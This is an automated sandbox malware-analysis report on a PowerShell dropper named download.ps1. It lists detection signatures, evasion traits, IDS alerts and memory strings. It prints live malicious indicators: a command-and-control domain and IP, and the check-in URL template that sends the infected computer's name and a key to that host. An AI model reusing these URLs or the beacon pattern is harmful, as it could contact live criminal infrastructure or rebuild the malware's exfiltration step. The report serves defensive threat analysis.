Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1580819
MD5:8d7677123f246bb6bfaf3e54501aa93d
SHA1:a2087790c0105e329964e38e776da360ce38fc3e
SHA256:ff7bc609b58de655c7e0b5ffb9c4a7adce64a8cf24bb131573b1def9ca66db84
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6672, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6672, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-26T10:02:00.603527+010020577411A Network Trojan was detected192.168.2.64969945.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-26T10:01:58.643168+010028594051Domain Observed Used for C2 Detected192.168.2.6516031.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-26T10:02:00.603527+010018100001Potentially Bad Traffic192.168.2.64969945.61.136.13880TCP
2024-12-26T10:02:02.718194+010018100001Potentially Bad Traffic192.168.2.649700142.250.181.6880TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://gajaechkfhfghal.topAvira URL Cloud: Label: malware
Source: http://gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: download.ps1Virustotal: Detection: 11%Perma Link
Source: download.ps1ReversingLabs: Detection: 15%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 81.6% probability
Source: Binary string: mscorlib.pdba source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbdll source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbj source: powershell.exe, 00000000.00000002.2267521502.00000111FA369000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2267521502.00000111FA369000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbw7Z source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2859405 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.6:51603 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49700 -> 142.250.181.68:80
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49699 -> 45.61.136.138:80
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.6:49699 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: gajaechkfhfghal.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$tcbm1lixhefpkn0/$9rkis8hejvfl3c4.php?id=$env:computername&key=$bhwpnfx&s=527
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2264659089.00000111FA277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mf-
Source: powershell.exe, 00000000.00000002.2264488304.00000111FA0D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.2217128894.00000111E363D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top
Source: powershell.exe, 00000000.00000002.2217128894.00000111E363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2217128894.00000111E1FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2217128894.00000111E388F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2217128894.00000111E1FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F201C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F21C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F201C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F21C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2217128894.00000111E39CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E44A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-202
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024
Source: powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F21C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C88520_2_00007FFD348C8852
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C7AA60_2_00007FFD348C7AA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B75FA0_2_00007FFD348B75FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348BB6480_2_00007FFD348BB648
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B77270_2_00007FFD348B7727
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B4FF30_2_00007FFD348B4FF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B38030_2_00007FFD348B3803
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B50FA0_2_00007FFD348B50FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B8BFA0_2_00007FFD348B8BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34982EF30_2_00007FFD34982EF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3498241C0_2_00007FFD3498241C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD349863C30_2_00007FFD349863C3
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4wX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w'
